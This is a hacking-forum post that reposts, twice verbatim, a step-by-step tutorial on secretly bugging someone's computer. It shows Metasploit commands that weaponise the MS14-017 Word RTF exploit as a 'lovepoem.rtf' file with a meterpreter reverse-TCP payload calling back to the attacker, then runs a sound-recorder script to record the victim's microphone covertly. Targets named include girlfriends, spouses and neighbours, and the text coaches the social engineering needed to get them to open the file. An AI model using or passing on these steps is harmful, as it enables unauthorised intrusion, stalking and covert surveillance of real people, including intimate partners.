Syrex
Divine
Divine
Contributor
Royal
Elite member
Premium
- Thread Author
- #2
LEAVE A LIKE, NOT DOING SO WILL GET YOU BANNED PERMANENTLY FOR LEECHING
-
How to Spy on Anyone?
-
[HIDE]
Now that nearly everyone and everyplace has a computer, you can use those remote computers for some good old "cloak and dagger" spying. No longer is spying something that only the CIA, NSA, KGB, and other intelligence agencies can doyou can learn to spy, too.
Inthis brand new series, we will explore how we can use the ubiquity of the computer to peek in on just about anyone and anyplace. Unlike the spy movies of yesteryear where the spy had to place a listening device in the lamp or in a houseplant, as long as there is a computer in the room, it can be used as a "bug."
We will examine how to turn that commonplace computer into our own bug to listen in on conversations, use as a spy camera, track Internet searches, and more. James Bond and Q have nothing on us!
In this first part, I will show you how to convert any computer, anywhere, into a listening device. As nearly every room now has a computer in it, you can put a bug in nearly every room, unnoticed and undetected.
Step 1Fire Up KaliThe first step, of course, is to fire upKali Linux. To be able to use any computer as a bug, the first step will be to compromise the target computer.
Step 2Compromise the Remote ComputerProbably the best way to compromise your target's computer is to use a carefully crafted email that will get the target toclick on a documentorlink. Inside that document or link, we will embed arootkit/listenerthat will enable us to turn onthe built-in microphoneon their computer and save any conversations in the room where it is located.
Since we know the victim (it may be a girlfriend, neighbor, spouse, business associate, foreign diplomat, foreign spy, etc.), we can can be very specific in crafting an email that would gain their acceptance. The key, of course, is to create document that sounds compelling, or at least interesting, to get the victim to click onthe Word document.
This becomes an exercise insocial engineeringat this point. If the victim is a girlfriend/boyfriend, you might try sending a love letter. If the victim is a business associate, it might be Word or Excel document with a sales or other report. If it is a neighbor, it may be a link to a community webpage.
I hope you get the point. Be creative and imaginative and send something that the person will be compelled to open and view.
Step 3Find an ExploitNow, if we want to exploit aWindows 7system (most Windows 7 exploits will work on Windows 8), we will need to find a Windows 7 exploit that utilizes vulnerabilities in Microsoft's Word application.
This past spring, Microsoft revealed that hackers had found a vulnerability in Microsoft Word and Office Web apps that could allow remote code execution (read, rootkit). Here is Microsoft's announcement on theirTechnet Security Bulletinbelow (more info on Technet can be foundhere).
As you can see, they have named it MS14-017. When we do a search inMetasploitfor this vulnerability/exploit, we find:
exploit/windows/fileformat/ms14_017_rtf
Now that we have found the proper exploit, let's load it into Metasploit by typing:
msf >use exploit/windows/fileformat/ms14_017_rtf
Once we have it loaded, let's type "info" to find more about this exploit.
Now, "show options."
As you can see, the option we need to fill is the FILENAME. In addition, note that this exploit works only on Office 2010.
Step 4Set the FILENAMEIn this example, we will be spying on your girlfriend, so let's send her a love poem. Let's set the FILENAME to "lovepoem.rtf."
set FILENAME lovepoem.rtf
Step 5Set the PayloadNext, we need to set the payload to place in her "lovepoem." In this case, let's send themeterpreteras it gives us almost unlimited power and control over the hacked system.
msf > set PAYLOAD windows/meterpreter/reverse_tcp
Next, set the LHOST. This is the IP of your system. This tells the payload who to call back when it is executed by the victim.
Finally, simply type "exploit." This will create a Word file called "lovepoem" that will place the meterpreter on her system that we can then connect to.
Step 6Open a Multi-Handler for the ConnectionFor the next step, we need to open a multi-handler to receive the connection back to our system.
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
And finally, set the LHOST to your IP.
Step 7Send the Love Poem to Your GirfriendNow that we have created our malicious file, you need to send it to your girlfriend. You likely will want to send it via an email attachment with a note telling her that your wrote her a short poem to express your love for her. Knowing that it is from you, I'm sure she will click on it as she loves you dearly and trusts you completely.
Step 8Compromise Her SystemWhen she opens it, we will have a meterpreter session on her computer like that below. Now comes the good part.
Step 9Record with the MicrophoneWhat we will do next is enable the microphone on her computer and begin to record all of the sounds within earshot of it. Metasploit has a Ruby script that will enable the microphone on the target machine and begin to record all sounds and conversations nearby. If we go toour ultimate list of meterpreter scripts, we can find it among the many ready Ruby scripts built for the meterpreter.
From the meterpreter prompt, simply type:
meterpreter > run sound_recorder - l /root
This will start the microphone on her computer and store the recorded conversations and sounds in a file in the/rootdirectory on your system. Of course, you can choose any directory to store these recordings. Just make certain you have adequate hard drive space, as these files can become very large. When you want to hear what was recorded, simply open the stored file on your system.
[/HIDE]
-
How to Spy on Anyone?
-
[HIDE]
Now that nearly everyone and everyplace has a computer, you can use those remote computers for some good old "cloak and dagger" spying. No longer is spying something that only the CIA, NSA, KGB, and other intelligence agencies can doyou can learn to spy, too.
Inthis brand new series, we will explore how we can use the ubiquity of the computer to peek in on just about anyone and anyplace. Unlike the spy movies of yesteryear where the spy had to place a listening device in the lamp or in a houseplant, as long as there is a computer in the room, it can be used as a "bug."
We will examine how to turn that commonplace computer into our own bug to listen in on conversations, use as a spy camera, track Internet searches, and more. James Bond and Q have nothing on us!
In this first part, I will show you how to convert any computer, anywhere, into a listening device. As nearly every room now has a computer in it, you can put a bug in nearly every room, unnoticed and undetected.
Step 1Fire Up KaliThe first step, of course, is to fire upKali Linux. To be able to use any computer as a bug, the first step will be to compromise the target computer.
Step 2Compromise the Remote ComputerProbably the best way to compromise your target's computer is to use a carefully crafted email that will get the target toclick on a documentorlink. Inside that document or link, we will embed arootkit/listenerthat will enable us to turn onthe built-in microphoneon their computer and save any conversations in the room where it is located.
Since we know the victim (it may be a girlfriend, neighbor, spouse, business associate, foreign diplomat, foreign spy, etc.), we can can be very specific in crafting an email that would gain their acceptance. The key, of course, is to create document that sounds compelling, or at least interesting, to get the victim to click onthe Word document.
This becomes an exercise insocial engineeringat this point. If the victim is a girlfriend/boyfriend, you might try sending a love letter. If the victim is a business associate, it might be Word or Excel document with a sales or other report. If it is a neighbor, it may be a link to a community webpage.
I hope you get the point. Be creative and imaginative and send something that the person will be compelled to open and view.
Step 3Find an ExploitNow, if we want to exploit aWindows 7system (most Windows 7 exploits will work on Windows 8), we will need to find a Windows 7 exploit that utilizes vulnerabilities in Microsoft's Word application.
This past spring, Microsoft revealed that hackers had found a vulnerability in Microsoft Word and Office Web apps that could allow remote code execution (read, rootkit). Here is Microsoft's announcement on theirTechnet Security Bulletinbelow (more info on Technet can be foundhere).
As you can see, they have named it MS14-017. When we do a search inMetasploitfor this vulnerability/exploit, we find:
exploit/windows/fileformat/ms14_017_rtf
Now that we have found the proper exploit, let's load it into Metasploit by typing:
msf >use exploit/windows/fileformat/ms14_017_rtf
Once we have it loaded, let's type "info" to find more about this exploit.
Now, "show options."
As you can see, the option we need to fill is the FILENAME. In addition, note that this exploit works only on Office 2010.
Step 4Set the FILENAMEIn this example, we will be spying on your girlfriend, so let's send her a love poem. Let's set the FILENAME to "lovepoem.rtf."
set FILENAME lovepoem.rtf
Step 5Set the PayloadNext, we need to set the payload to place in her "lovepoem." In this case, let's send themeterpreteras it gives us almost unlimited power and control over the hacked system.
msf > set PAYLOAD windows/meterpreter/reverse_tcp
Next, set the LHOST. This is the IP of your system. This tells the payload who to call back when it is executed by the victim.
Finally, simply type "exploit." This will create a Word file called "lovepoem" that will place the meterpreter on her system that we can then connect to.
Step 6Open a Multi-Handler for the ConnectionFor the next step, we need to open a multi-handler to receive the connection back to our system.
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
And finally, set the LHOST to your IP.
Step 7Send the Love Poem to Your GirfriendNow that we have created our malicious file, you need to send it to your girlfriend. You likely will want to send it via an email attachment with a note telling her that your wrote her a short poem to express your love for her. Knowing that it is from you, I'm sure she will click on it as she loves you dearly and trusts you completely.
Step 8Compromise Her SystemWhen she opens it, we will have a meterpreter session on her computer like that below. Now comes the good part.
Step 9Record with the MicrophoneWhat we will do next is enable the microphone on her computer and begin to record all of the sounds within earshot of it. Metasploit has a Ruby script that will enable the microphone on the target machine and begin to record all sounds and conversations nearby. If we go toour ultimate list of meterpreter scripts, we can find it among the many ready Ruby scripts built for the meterpreter.
From the meterpreter prompt, simply type:
meterpreter > run sound_recorder - l /root
This will start the microphone on her computer and store the recorded conversations and sounds in a file in the/rootdirectory on your system. Of course, you can choose any directory to store these recordings. Just make certain you have adequate hard drive space, as these files can become very large. When you want to hear what was recorded, simply open the stored file on your system.
[/HIDE]